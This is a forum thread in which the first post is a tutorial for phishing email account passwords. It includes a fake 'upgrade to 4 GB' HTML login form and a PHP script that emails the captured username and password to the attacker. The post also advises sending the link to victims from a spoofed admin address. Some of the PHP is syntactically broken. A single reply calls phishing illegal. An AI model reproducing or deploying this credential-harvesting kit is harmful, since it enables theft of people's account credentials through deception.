Landing Page Generator
Advertise HERE for just $10 USD per month.
Webmaster Forum
Domains & Webhosting SEO Forum Buy, Sell & Trade Search Engine Forum
Go Back   Webmaster Forum > Development > Programming > PHP
Reload this Page Phishing - Email passwords via PHP
REMOVE the ads below !
Reply
 
LinkBack Thread Tools
  # 1 (permalink)
Old
Junior Geek
Posts: 112
Join Date: Dec 2007
iTrader: (0)
Location: jaipur
Lightbulb Phishing - Email passwords via PHP - 01-06-2008
Phishing - Email passwords via PHP
taken from other comm, credit goes to nik.

Firstly, what is phishing?

Phishing is the way to steal informations about person (credit card number, name or password to any service), by masquerading as a trustworthy person or business in an electronic communication. It is typically carried out using email or an instant messenger, we will use just e-mail.

The way to do this is PHP. We create simple HTML form with PHP script, which send input data to our email.

Now have a look on it:

What we need ?
  • server with PHP support
  • fake mailer
  • basic knowledge

How it works?

There are two php files, one is form.php, second is perform.php . In form.php is form, which requires login and pass to e-mail. When user enter it and click on Submit, form.php sends input to perform.php, where is input sended to your e-mail.
Simple, huh?

Sources:

form.php

PHP Code:
<html>
<body>
  
  <form action="perform.php" method="post">

    <h1>Want more space?? Upgrade your account to 4 GB!!!</h1>

    <b>Information about E-Mail Account:</b><br>
    Login: <input type="text" name="login" /><br>
    <br>

    Pass: <input type="text" name="pass" /><br>
    <br>

    I want upgrade:
    <input type="checkbox" disabled="yes" checked="yes" name="iwant" />
    <input type="submit" value="Submit">

  </form>
  
</body>
</html

perform.php

PHP Code:
<?php

  $to "your-email@provider.etc";
  $subject "Password of user $login";
  $message "Hello! Password of user $login is $pass";
  $from "something@something.etc";
  $headers "From: $from";

mail($to,$subject,$message,$headers);

echo "User $login successfully upgraded";

?>
Next step...

Now change email in perform.php to your email and upload both files on server.

Send to victim url to form.php with some nice comment... (for example: yourdomain.com/form.php), or, and this is better, send this from admin, or webmaster email (for example: admin@emailprovider.etc) for better effect (for this use fake mailer)
Reply With Quote
  # 2 (permalink)
Old
Promotion Team Leader
Posts: 1,478
Join Date: Aug 2007
iTrader: (0)
Location: Sujangarh (Rajasthan,India)
Re: Phishing - Email passwords via PHP - 01-06-2008
It will be better if you post any article related to how to secure from phishing.
Phishing is illegal.
Reply With Quote
Reply

« Previous Thread | Next Thread »

Thread Tools




About | Privacy | Rules | Guidelines | Advertise | RSS
vBulletin®, Copyright ©2000 - 2008, Jelsoft Enterprises Ltd. | SEO by vBSEO | Skin developed by vBStyles.com
Contact Us - Staff - Sitemap - Archives - Top